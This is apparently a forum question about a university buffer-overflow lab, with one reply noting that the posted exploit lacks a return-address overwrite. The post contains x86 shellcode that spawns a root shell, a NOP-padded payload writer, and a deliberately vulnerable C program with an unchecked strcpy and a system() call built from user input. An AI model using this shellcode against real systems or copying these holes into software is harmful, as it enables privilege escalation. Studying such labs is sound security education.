# Buffer overflow exploit, create a bad file and pass it to a program

Tags: c, security, computer-science, buffer-overflow, exploit

I am working with buffer overflow exploit to understand it. I have been provided with a program called is_log_file.c to test the buf_exploit.c program I write on it. I am trying to write a program called exploit.c that takes no arguments and writes a malicious log file. This malicious log file will be provided as an argument to is_log_file program and it should exploit a buffer overflow to provide root access. The program should do so without crashing or unclean exist.

is_log_file.c takes a file name and verifies if it conforms to a log file format defined
within the file

Code for buf_exploit.c is below:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFER_SIZE 1024
#define NOP 0x90

char shellcode[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"  // setuid(0);
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"  // setgid(0);
"\x31\xc0"          /* xorl         %eax,%eax               */
"\x50"              /* pushl        %eax                    */
"\x68""//sh"        /* pushl        $0x68732f2f             */
"\x68""/bin"        /* pushl        $0x6e69622f             */
"\x89\xe3"          /* movl         %esp,%ebx               */
"\x50"              /* pushl        %eax                    */
"\x53"              /* pushl        %ebx                    */
"\x89\xe1"          /* movl         %esp,%ecx               */
"\x99"              /* cdq                                  */
"\xb0\x0b"          /* movb         $0x0b,%al               */
"\xcd\x80"          /* int          $0x80                   */
;

int main() {
   char buffer[BUFFER_SIZE];
   char *log_file = "malicious_log_file";
   FILE *fp;

   // Fill the buffer with NOP instructions
   memset(buffer, NOP, BUFFER_SIZE);

   // Copy the shellcode into the buffer
   memcpy(buffer + (BUFFER_SIZE - sizeof(shellcode)), shellcode, sizeof(shellcode));

   // Write the buffer to the log file
   fp = fopen(log_file, "w");
   fwrite(buffer,BUFFER_SIZE, 1, fp);
   fclose(fp);

   // Execute the is_log_file program with the malicious log file as an argument
  //system("./is_log_file malicious_log_file");

   return 0;
}
```

code for is_log_file:

```
/* 
 Buffer Overflow Lab

 Program that verifies that the argument is a valid log file

*/ 
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int verify(char *buffer) {
 char local_buf[32];
 //printf("%p\n", local_buf);
 char VALID_SIGNATURE[23] = "LOG_FILE VERSION_CODE=";
 int rv = 0;

 //valid log file should contain VALID_SIGNATURE
 strcpy(local_buf, buffer);
 rv = strncmp(VALID_SIGNATURE, local_buf, strlen(VALID_SIGNATURE));
 if ( rv == 0)
   return 1;
 return 0;
}

int main(int argc, char ** argv) {

 char command[256] = "./file_exists ";
 char buffer[1024];
 FILE *file = NULL;
 int rv = 0;

 //Verify the number of arguments
 if (argc != 2) {
   printf("Usage: %s <file-to-test>\n", argv[0]);
   return 0;
 }

 //Verify the supplied file exists
 strncat(command, argv[1], 244);
 rv = system(command);
 if (rv <= 0) {
   printf("%s does not exist\n", argv[1]);
   return 0;
 }
 
 //read file
 if ((file = fopen(argv[1], "r")) == NULL) {
   printf("File read error\n");
   return 0;
 }
 fscanf(file,"%[^\n]", buffer);
 fclose(file);

 if (verify(buffer) == 1)
   printf("Valid!!!\n");
 else
   printf("Invalid!!!\n");
 
}
```

buf_exploit.c runs without errors, but when I run ./is_log_file malicious _log_file it seg faults, I would appreciate some help getting the code to work. The code is in C

Comment: The file you create is 1024 bytes... the buffer in `is_log_file.c` is also 1024 bytes. That does not seem enough to me to overflow. At most you have the final NUL terminator outside `buffer` so the overflow is 1 byte. Anyway, you're missing some steps, you cannot just put random machine code on the stack and expect the program to execute it for you out of kindness. You will have to somehow locate the stack and make the program jump to it. I suggest you take another look at the material you have for whatever course you are following or ask who gave you this assignment for some explanation.